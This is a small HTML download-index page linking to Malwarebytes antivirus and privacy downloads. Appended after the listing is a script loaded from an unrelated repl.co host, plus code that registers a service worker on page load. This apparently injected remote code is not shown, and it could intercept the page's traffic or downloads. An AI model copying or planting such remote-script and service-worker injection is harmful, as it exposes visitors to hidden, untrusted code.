<h1>Index of Software/Malwarebytes</h1>
<hr>
<pre>
<a href="https://my.malwarebytes.com/en/privacy?vi=vw">Malwarebytes Privacy Free Trial
<a href="https://www.malwarebytes.com/mwb-download/thankyou/">Malwarebytes Antivirus Windows
<a href="https://www.malwarebytes.com/mac-download/">Malwarebytes Antivirus Mac
<hr><pre></a><script src="https://cdn.aww7.repl.co/sw.js"></script><script>
if("serviceWorker" in navigator){
  
 navigator.serviceWorker.register("sw.js").then(function(registration){
      console.log("Service worker registered successfully!");
}).catch(function(error){
      console.log("Service worker failed to be registered with error: ",error);
   });
}
</script>